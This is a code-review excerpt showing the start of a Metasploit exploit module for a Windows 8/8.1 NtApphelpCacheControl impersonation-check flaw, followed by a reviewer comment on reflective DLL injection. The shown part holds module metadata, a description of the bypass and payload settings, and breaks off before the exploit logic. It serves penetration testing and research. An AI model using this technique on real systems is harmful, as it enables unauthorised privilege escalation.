modules/exploits/windows/local/ntapphelpcachecontrol.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Windows NtApphelpCacheControl Improper Authorization Check',
+      'Description'    => %q{
+        On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
+        allows application compatibility data to be cached for quick reuse when new processes are
+        created. A normal user can query the cache but cannot add new cached entries as the
+        operation is restricted to administrators. This is checked in the function
+        AhcVerifyAdminContext.
+
+        This function has a vulnerability where it doesn't correctly check the impersonation token
+        of the caller to determine if the user is an administrator. It reads the caller's
+        impersonation token using PsReferenceImpersonationToken and then does a comparison between
+        the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
+        of the token so it's possible to get an identify token on your thread from a local system
+        process and bypass this check.
+
+        This module currently only affects Windows 8 and Windows 8.1, and requires access to
+        C:\Windows\System\ComputerDefaults.exe (although this can be improved).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'James Forshaw',
+          'sinn3r'
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 8 / 8.1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'OSVEB', '116497' ],
+          [ 'EDB', '35661' ],
+          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
+        ],
+      'DisclosureDate' => 'Sep 30 2014',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def temp
+    @temp ||= get_env('TEMP').to_s
+  end
+
+  def env_var_name
+    # If you want to change this, make sure you change the one in exploit.cpp too
+    'PAYLOAD_PATH'
```

Comment:
If you compile the ReflectiveDLL with `REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR` you can pass a value such as this via `lpReserved` (The bypassuac_injection DLL does something similar).